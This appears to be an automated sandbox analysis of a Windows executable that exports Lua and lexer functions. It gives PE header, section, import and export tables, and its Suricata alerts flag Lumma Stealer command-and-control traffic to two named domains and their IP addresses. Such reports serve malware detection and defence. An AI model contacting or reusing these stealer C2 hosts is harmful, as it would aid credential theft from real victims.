Thumbprint SHA-256:	4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
Serial:	060E2F8F9E1B8BE518D5FE2B69CFCCB1

Entrypoint Preview

Instruction
call 00007FB95CDFE0E4h
jmp 00007FB95CDFDA0Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB95CC78581h
mov dword ptr [esi], 005ADAA4h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 005ADAACh
mov dword ptr [ecx], 005ADAA4h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB95CC7854Eh
mov dword ptr [esi], 005ADAC0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 005ADAC8h
mov dword ptr [ecx], 005ADAC0h
ret
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 005ADA98h
push eax
call 00007FB95CDFE187h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 005ADA98h
push eax
call 00007FB95CDFE170h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FB95CDFDB9Ch
push 0000000Ch
push esi
call 00007FB95CDFD276h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FB95CDFDAFEh
push 005EE6BCh
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FB95CDFE142h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ee870	0xe3c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1ef6ac	0x208	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x204000	0x2d957	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x297c00	0x2870	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x232000	0x11472	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1de540	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1de650	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1de5b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1ad000	0x8fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ab765	0x1ab800	35b3882fb84d2c3c2e9541127c9bb5b0	False	0.49125605354532165	data	6.625864824158646	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1ad000	0x45ed2	0x46000	c620e9c1358dec994d346d5ec97f18f9	False	0.3361363002232143	data	5.559929453091573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f3000	0x10060	0xfc00	ca7a852e7f3f4d04c757a15e362c6f8d	False	0.4250372023809524	DOS executable (block device driver \277DN\346@\273)	4.825556059166698	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x204000	0x2d957	0x2da00	527da42bcbfcf4fd4d10a26f5e412f33	False	0.21568921232876712	data	5.092579347709825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x232000	0x68a00	0x68a00	b08cf37bce51a56e378a362ef413cc59	False	0.6475181078255675	data	7.538314299200359	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PROPERTIES	0x204b70	0x1c3da	Non-ISO extended-ASCII text, with CRLF line terminators	English	United States	0.23243771288275672
RT_CURSOR	0x220f4c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.4805194805194805
RT_BITMAP	0x221080	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, resolution 2834 x 2834 px/m, 16 important colors	English	United States	0.48660714285714285
RT_BITMAP	0x221160	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.18316831683168316
RT_BITMAP	0x221488	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.14603960396039603
RT_BITMAP	0x2217b0	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.1349009900990099
RT_BITMAP	0x221ad8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.1745049504950495
RT_BITMAP	0x221e00	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.32425742574257427
RT_BITMAP	0x222128	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 0	English	United States	0.12128712871287128
RT_BITMAP	0x222450	0x188	Device independent bitmap graphic, 24 x 24 x 4, image size 288, resolution 2834 x 2834 px/m, 16 important colors	English	United States	0.3877551020408163
RT_BITMAP	0x2225d8	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.12903225806451613
RT_BITMAP	0x222ab0	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.1032258064516129
RT_BITMAP	0x222f88	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.0935483870967742
RT_BITMAP	0x223460	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.13709677419354838
RT_BITMAP	0x223938	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.2403225806451613
RT_BITMAP	0x223e10	0x4d8	Device independent bitmap graphic, 20 x 20 x 24, image size 0	English	United States	0.10806451612903226
RT_BITMAP	0x2242e8	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.10463800904977376
RT_BITMAP	0x2249d0	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.08653846153846154
RT_BITMAP	0x2250b8	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.08031674208144797
RT_BITMAP	0x2257a0	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.10576923076923077
RT_BITMAP	0x225e88	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.21153846153846154
RT_BITMAP	0x226570	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 0	English	United States	0.08936651583710407
RT_BITMAP	0x226c58	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.07390745501285347
RT_BITMAP	0x227880	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.08451156812339332
RT_BITMAP	0x2284a8	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.07133676092544987
RT_BITMAP	0x2290d0	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.09993573264781491
RT_BITMAP	0x229cf8	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.15167095115681234
RT_BITMAP	0x22a920	0xc28	Device independent bitmap graphic, 32 x 32 x 24, image size 0	English	United States	0.052377892030848326
RT_ICON	0x22b548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colors	English	United States	0.6317567567567568
RT_ICON	0x22b670	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.5823699421965318
RT_ICON	0x22bbd8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colors	English	United States	0.5120967741935484
RT_ICON	0x22bec0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5455776173285198
RT_ICON	0x22c768	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.36341463414634145
RT_ICON	0x22cdd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42350746268656714
RT_MENU	0x22dc78	0x1330	data	English	United States	0.3373371335504886
RT_DIALOG	0x22efa8	0xd8	data	English	United States	0.6481481481481481
RT_DIALOG	0x22f080	0x288	data	English	United States	0.4212962962962963
RT_DIALOG	0x22f308	0x29c	data	English	United States	0.4476047904191617
RT_DIALOG	0x22f5a4	0x120	data	English	United States	0.5798611111111112
RT_DIALOG	0x22f6c4	0x1f0	data	English	United States	0.4213709677419355
RT_DIALOG	0x22f8b4	0x1c8	data	English	United States	0.4166666666666667
RT_DIALOG	0x22fa7c	0x1cc	data	English	United States	0.5130434782608696
RT_DIALOG	0x22fc48	0x328	data	English	United States	0.4752475247524752
RT_DIALOG	0x22ff70	0x3ee	data	English	United States	0.4224652087475149
RT_DIALOG	0x230360	0x3a0	data	English	United States	0.4665948275862069
RT_DIALOG	0x230700	0x4ae	data	English	United States	0.41569282136894825
RT_ACCELERATOR	0x230bb0	0x2b0	data	English	United States	0.5537790697674418
RT_GROUP_CURSOR	0x230e60	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x230e74	0x5a	data	English	United States	0.7333333333333333
RT_VERSION	0x230ed0	0x354	data	English	United States	0.45892018779342725
RT_MANIFEST	0x231224	0x733	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4139989148128052

Imports

DLL	Import
IMM32.dll	ImmSetCompositionFontW, ImmSetCompositionWindow, ImmGetContext, ImmEscapeW, ImmSetCompositionStringW, ImmSetCandidateWindow, ImmGetCompositionStringW, ImmReleaseContext, ImmNotifyIME
MSIMG32.dll	AlphaBlend, TransparentBlt
COMCTL32.dll	InitCommonControlsEx
UxTheme.dll	DrawThemeBackground, GetThemeBackgroundContentRect, OpenThemeData, DrawThemeParentBackground, CloseThemeData, GetThemePartSize
KERNEL32.dll	LockResource, GlobalFree, LoadResource, FindResourceW, PeekConsoleInputW, LocalFree, VerSetConditionMask, GetConsoleWindow, VerifyVersionInfoW, AllocConsole, GetExitCodeProcess, GetTimeFormatA, CreateFileW, FileTimeToSystemTime, GetDateFormatA, FileTimeToLocalFileTime, GetFileTime, GetLocaleInfoW, Beep, CreateMutexW, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetModuleFileNameA, LoadLibraryExA, FormatMessageA, LoadLibraryA, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, CreateEventW, WaitForSingleObjectEx, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount, GetLastError, GetProcAddress, GetModuleHandleW, FreeLibrary, MulDiv, LoadLibraryExW, GetLocaleInfoA, Sleep, GlobalSize, GlobalAlloc, GlobalLock, LCMapStringW, WideCharToMultiByte, GetTickCount, GlobalUnlock, ReadFile, FindFirstFileW, SetHandleInformation, CompareStringW, GetFullPathNameW, FindNextFileW, CreatePipe, PeekNamedPipe, FindClose, WaitForSingleObject, GetFileAttributesExW, CloseHandle, CreateProcessW, LoadLibraryW, IsDBCSLeadByteEx, SizeofResource, GetCommandLineW, GetStdHandle, GetCPInfo, WriteFile, TerminateProcess, FormatMessageW, GetModuleFileNameW, GetTempPathW, GetFileAttributesW, FreeResource, SetCurrentDirectoryA, IsValidCodePage, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, MultiByteToWideChar
USER32.dll	SendMessageTimeoutW, GetThreadDesktop, EnumWindows, GetUserObjectInformationW, GetWindowTextLengthW, DrawFocusRect, GetClassNameW, DrawFrameControl, GetNextDlgTabItem, GetWindowTextW, CreateDialogParamW, EndDialog, IsDialogMessageW, SetDlgItemTextW, SendDlgItemMessageW, IsDlgButtonChecked, GetDlgItemInt, GetDlgItem, CheckDlgButton, DialogBoxParamW, EnableWindow, DeferWindowPos, OpenClipboard, GetParent, ReleaseCapture, InvalidateRect, ReleaseDC, GetCursorPos, BeginPaint, EndPaint, DrawTextW, GetClientRect, GetMenuState, ModifyMenuW, CheckMenuRadioItem, GetWindow, GetMenuItemCount, DeleteMenu, GetClassInfoW, BeginDeferWindowPos, SetMenuItemInfoW, GetTopWindow, DrawMenuBar, EndDeferWindowPos, InsertMenuW, CheckMenuItem, EnableMenuItem, GetMessageW, GetMenuItemInfoW, GetMenu, MessageBoxW, GetWindowPlacement, LoadAcceleratorsW, GetSubMenu, DispatchMessageW, VkKeyScanW, DestroyAcceleratorTable, PeekMessageW, SetWindowPlacement, WinHelpW, FlashWindow, TranslateAcceleratorW, TranslateMessage, LoadIconW, FindWindowW, AppendMenuW, PostQuitMessage, UpdateWindow, SetForegroundWindow, LoadImageW, IsIconic, GetFocus, SetWindowTextW, RegisterClassW, RegisterWindowMessageW, SetScrollInfo, RegisterClipboardFormatW, GetKeyState, GetUpdateRgn, PostMessageW, HideCaret, ScreenToClient, NotifyWinEvent, GetScrollInfo, MsgWaitForMultipleObjects, SetCaretPos, SystemParametersInfoW, SetTimer, GetDlgCtrlID, CloseClipboard, EmptyClipboard, IsChild, CreateCaret, ValidateRect, TrackMouseEvent, GetKeyboardLayout, GetMessageTime, SetFocus, GetClipboardData, DestroyCaret, SetClipboardData, AppendMenuA, IsClipboardFormatAvailable, GetCaretBlinkTime, ShowCaret, KillTimer, PtInRect, GetWindowLongW, DefWindowProcW, AdjustWindowRectEx, CallWindowProcW, MonitorFromPoint, GetWindowRect, DestroyWindow, InflateRect, GetDC, SetWindowPos, CopyImage, MonitorFromRect, MonitorFromWindow, FillRect, CreateWindowExW, GetIconInfo, SendMessageW, GetSystemMetrics, UnregisterClassW, CreatePopupMenu, RegisterClassExW, DestroyCursor, TrackPopupMenu, ShowWindow, DrawTextA, GetMonitorInfoW, CreateIconIndirect, ClientToScreen, MapWindowPoints, GetDoubleClickTime, FrameRect, GetSysColor, DestroyMenu, LoadCursorW, SetCapture, SetCursor, SetWindowLongW, SystemParametersInfoA
GDI32.dll	TranslateCharsetInfo, EndPage, DPtoLP, CreateRectRgnIndirect, CreateRectRgn, CreateBitmap, CombineRgn, BitBlt, CreateCompatibleBitmap, ExtTextOutA, SelectObject, CreateDIBSection, GetTextExtentPoint32A, CreateCompatibleDC, GetTextExtentExPointW, StretchBlt, GetNearestColor, GetTextExtentExPointA, GetDeviceCaps, GetTextMetricsW, CreatePatternBrush, DeleteDC, GetTextExtentPoint32W, SetTextColor, SetBkMode, LineTo, CreatePen, Rectangle, GetObjectW, Polygon, MoveToEx, SetBkColor, Ellipse, DeleteObject, CreateSolidBrush, CreateFontIndirectW, SetTextAlign, RoundRect, ExtTextOutW, IntersectClipRect, EndDoc, StartPage, CreateFontA, GetDIBits, GetStockObject, StartDocW
COMDLG32.dll	GetSaveFileNameW, CommDlgExtendedError, PageSetupDlgW, GetOpenFileNameW, PrintDlgW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegQueryValueExW
SHELL32.dll	Shell_NotifyIconW, SHGetPathFromIDListW, SHGetMalloc, DragAcceptFiles, ShellExecuteExW, DragFinish, SHBrowseForFolderW, DragQueryFileW
ole32.dll	ReleaseStgMedium, RevokeDragDrop, CoCreateInstance, CLSIDFromProgID, RegisterDragDrop, OleUninitialize, DoDragDrop, OleInitialize
OLEAUT32.dll	SysFreeString, SysAllocString
MSVCP140.dll	??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z, ?uncaught_exception@std@@YA_NXZ, ??0_Locinfo@std@@QAE@PBD@Z, ??1_Locinfo@std@@QAE@XZ, ??Bid@locale@std@@QAEIXZ, ?_Incref@facet@locale@std@@UAEXXZ, ?_Decref@facet@locale@std@@UAEPAV_Facet_base@3@XZ, ??0facet@locale@std@@IAE@I@Z, ??1facet@locale@std@@MAE@XZ, ?tolower@?$ctype@D@std@@QBEDD@Z, ?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z, ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ?is@?$ctype@_W@std@@QBE_NF_W@Z, ?tolower@?$ctype@_W@std@@QBE_W_W@Z, ?tolower@?$ctype@_W@std@@QBEPB_WPA_WPB_W@Z, ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, _Query_perf_counter, _Strcoll, _Wcsxfrm, ?id@?$collate@D@std@@2V0locale@2@A, ?id@?$collate@_W@std@@2V0locale@2@A, ?id@?$ctype@D@std@@2V0locale@2@A, ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z, ?id@?$ctype@_W@std@@2V0locale@2@A, ?_Xbad_alloc@std@@YAXXZ, ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ, ??0_Lockit@std@@QAE@H@Z, ??1_Lockit@std@@QAE@XZ, _Query_perf_frequency, _Wcscoll, _Strxfrm, ?__ExceptionPtrRethrow@@YAXPBX@Z, ?__ExceptionPtrDestroy@@YAXPAX@Z, ?__ExceptionPtrToBool@@YA_NPBX@Z, ?_XGetLastError@std@@YAXXZ, ?_Xout_of_range@std@@YAXPBD@Z, ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z, ?__ExceptionPtrCopy@@YAXPAXPBX@Z, ?__ExceptionPtrCreate@@YAXPAX@Z, ?_Xlength_error@std@@YAXPBD@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ, ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@F@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z, ?_Throw_C_error@std@@YAXH@Z, _Mtx_destroy_in_situ, _Mtx_lock, _Mtx_init_in_situ, _Mtx_unlock, _Cnd_signal, ?_Throw_Cpp_error@std@@YAXH@Z, _Cnd_do_broadcast_at_thread_exit, _Cnd_destroy, _Cnd_wait, _Mtx_init, _Thrd_start, _Thrd_detach, _Mtx_destroy, _Cnd_init, ?_Xinvalid_argument@std@@YAXPBD@Z, ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ
VCRUNTIME140.dll	strstr, strrchr, wcsrchr, longjmp, _CxxThrowException, __std_exception_copy, _except_handler4_common, __std_exception_destroy, _purecall, strchr, __std_terminate, __CxxFrameHandler3, __RTDynamicCast, _setjmp3, memchr, memcpy, memmove, memset
api-ms-win-crt-runtime-l1-1-0.dll	_controlfp_s, strerror, _invalid_parameter_noinfo_noreturn, exit, _register_thread_local_exe_atexit_callback, _c_exit, _exit, _initterm_e, _initterm, _get_narrow_winmain_command_line, _set_app_type, terminate, abort, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, system, _errno
api-ms-win-crt-math-l1-1-0.dll	_CIacos, lround, roundf, __setusermatherr, _CIasin, _CIatan2, frexp, _CIcos, truncf, _CIfmod, _CIlog, _CIlog10, _CIpow, floor, _CIsin, _CIsqrt, lroundf, ldexp, _CItan, ceil, _CIexp
api-ms-win-crt-string-l1-1-0.dll	strpbrk, toupper, isgraph, strcoll, tolower, islower, strncmp, isspace, iscntrl, isalnum, isxdigit, strncpy, wcsncmp, ispunct, isalpha, strspn, isdigit, strnlen, isupper
api-ms-win-crt-stdio-l1-1-0.dll	tmpnam, fgets, fwrite, fopen, __stdio_common_vfprintf, _wpopen, fclose, __stdio_common_vsprintf, _popen, fputc, getc, freopen, ferror, _fseeki64, __acrt_iob_func, _ftelli64, ungetc, setvbuf, tmpfile, _set_fmode, fflush, _pclose, _wfopen, clearerr, __p__commode, feof, fputs, ftell, fread, __stdio_common_vsscanf
api-ms-win-crt-convert-l1-1-0.dll	atol, atoi, strtoll, strtod, atoll, strtol, strtof
api-ms-win-crt-heap-l1-1-0.dll	free, malloc, realloc, _callnewh, _set_new_mode
api-ms-win-crt-time-l1-1-0.dll	_time64, _gmtime64, _difftime64, clock, _mktime64, _localtime64, strftime
api-ms-win-crt-filesystem-l1-1-0.dll	remove, rename, _wchdir, _wunlink, _wstat64i32, _waccess
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, getenv, _wgetenv, _wgetcwd
api-ms-win-crt-locale-l1-1-0.dll	setlocale, localeconv, _configthreadlocale
api-ms-win-crt-utility-l1-1-0.dll	srand, rand

Exports

Name	Ordinal	Address
_CreateLexer@4	1	0x402270
_GetLexerCount@0	2	0x4021c0
_GetLexerFactory@4	3	0x402250
_GetLexerName@12	4	0x4021e0
luaL_addlstring	5	0x57b4f0
luaL_addstring	6	0x57b520
luaL_addvalue	7	0x57b640
luaL_argerror	8	0x57a850
luaL_buffinit	9	0x57b770
luaL_buffinitsize	10	0x57b7a0
luaL_callmeta	11	0x57bfa0
luaL_checkany	12	0x57afb0
luaL_checkinteger	13	0x57b190
luaL_checklstring	14	0x57afe0
luaL_checknumber	15	0x57b080
luaL_checkoption	16	0x57ae60
luaL_checkstack	17	0x57af30
luaL_checktype	18	0x57af70
luaL_checkudata	19	0x57ae30
luaL_checkversion_	20	0x57c900
luaL_error	21	0x57aa50
luaL_execresult	22	0x57ab30
luaL_fileresult	23	0x57aa90
luaL_getmetafield	24	0x57beb0
luaL_getsubtable	25	0x57c420
luaL_gsub	26	0x57c6a0
luaL_len	27	0x57c030
luaL_loadbufferx	28	0x57be30
luaL_loadfilex	29	0x57bb90
luaL_loadstring	30	0x57be70
luaL_newmetatable	31	0x57ac20
luaL_newstate	32	0x57c8e0
luaL_openlibs	33	0x585ef0
luaL_optinteger	34	0x57b1f0
luaL_optlstring	35	0x57b010
luaL_optnumber	36	0x57b0d0
luaL_prepbuffsize	37	0x57b360
luaL_pushresult	38	0x57b560
luaL_pushresultsize	39	0x57b620
luaL_ref	40	0x57b7d0
luaL_requiref	41	0x57c500
luaL_setfuncs	42	0x57c320
luaL_setmetatable	43	0x57ad30
luaL_testudata	44	0x57ad70
luaL_tolstring	45	0x57c0b0
luaL_traceback	46	0x57a500
luaL_unref	47	0x57b910
luaL_where	48	0x57a9d0
lua_absindex	49	0x578180
lua_arith	50	0x578510
lua_atpanic	51	0x578140
lua_callk	52	0x579630
lua_checkstack	53	0x578050
lua_close	54	0x593070
lua_compare	55	0x578570
lua_concat	56	0x579ce0
lua_copy	57	0x5782f0
lua_createtable	58	0x578f20
lua_dump	59	0x5799a0
lua_error	60	0x579ba0
lua_gc	61	0x579a30
lua_getallocf	62	0x579d70
lua_getfield	63	0x578d40
lua_getglobal	64	0x578c80
lua_gethook	65	0x581c10
lua_gethookcount	66	0x581c30
lua_gethookmask	67	0x581c20
lua_geti	68	0x578d70
lua_getinfo	69	0x5822b0
lua_getlocal	70	0x581d50
lua_getmetatable	71	0x578f70
lua_getstack	72	0x581c40
lua_gettable	73	0x578cc0
lua_gettop	74	0x5781b0
lua_getupvalue	75	0x579e50
lua_getuservalue	76	0x578fd0
lua_iscfunction	77	0x5783e0
lua_isinteger	78	0x578410
lua_isnumber	79	0x578430
lua_isstring	80	0x578470
lua_isuserdata	81	0x5784a0
lua_isyieldable	82	0x583a70
lua_len	83	0x579d40
lua_load	84	0x5797c0
lua_newstate	85	0x592e20
lua_newthread	86	0x592d00
lua_newuserdata	87	0x579dc0
lua_next	88	0x579bb0
lua_pcallk	89	0x5796e0
lua_pushboolean	90	0x578b70
lua_pushcclosure	91	0x578ab0
lua_pushfstring	92	0x578a70
lua_pushinteger	93	0x578910
lua_pushlightuserdata	94	0x578b90
lua_pushlstring	95	0x578940
lua_pushnil	96	0x5788d0
lua_pushnumber	97	0x5788f0
lua_pushstring	98	0x5789e0
lua_pushthread	99	0x578bb0
lua_pushvalue	100	0x578360
lua_pushvfstring	101	0x578a30
lua_rawequal	102	0x5784d0
lua_rawget	103	0x578e20
lua_rawgeti	104	0x578e70
lua_rawgetp	105	0x578ec0
lua_rawlen	106	0x578770
lua_rawset	107	0x579300
lua_rawseti	108	0x579390
lua_rawsetp	109	0x579450
lua_resume	110	0x5838f0
lua_rotate	111	0x578290
lua_setallocf	112	0x579da0
lua_setfield	113	0x5791e0
lua_setglobal	114	0x5790f0
lua_sethook	115	0x581bd0
lua_seti	116	0x579210
lua_setlocal	117	0x581e00
lua_setmetatable	118	0x579510
lua_settable	119	0x579130
lua_settop	120	0x5781d0
lua_setupvalue	121	0x579ef0
lua_setuservalue	122	0x5795b0
lua_status	123	0x579a20
lua_stringtonumber	124	0x5785f0
lua_toboolean	125	0x5786c0
lua_tocfunction	126	0x5787e0
lua_tointegerx	127	0x578660
lua_tolstring	128	0x5786f0
lua_tonumberx	129	0x578610
lua_topointer	130	0x578860
lua_tothread	131	0x578840
lua_touserdata	132	0x578810
lua_type	133	0x5783a0
lua_typename	134	0x5783d0
lua_upvalueid	135	0x57a000
lua_upvaluejoin	136	0x57a050
lua_version	137	0x578160
lua_xmove	138	0x5780e0
lua_yieldk	139	0x583a90
luaopen_base	140	0x57e280
luaopen_bit32	141	0x57e370
luaopen_coroutine	142	0x580110
luaopen_debug	143	0x581af0
luaopen_io	144	0x587d60
luaopen_math	145	0x58af30
luaopen_os	146	0x58e3b0
luaopen_package	147	0x58c430
luaopen_string	148	0x596fa0
luaopen_table	149	0x599130
luaopen_utf8	150	0x59aa80

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T11:42:13.803098+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	188.114.97.3	443	TCP
2024-10-13T11:42:13.803098+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	188.114.97.3	443	TCP
2024-10-13T11:42:13.808579+0200	2056570	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)	1	192.168.2.4	58518	1.1.1.1	53	UDP
2024-10-13T11:42:14.310273+0200	2056571	ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)	1	192.168.2.4	49732	188.114.96.3	443	TCP
2024-10-13T11:42:14.760733+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	188.114.96.3	443	TCP
2024-10-13T11:42:14.760733+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	188.114.96.3	443	TCP
2024-10-13T11:42:14.762853+0200	2056568	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)	1	192.168.2.4	53988	1.1.1.1	53	UDP
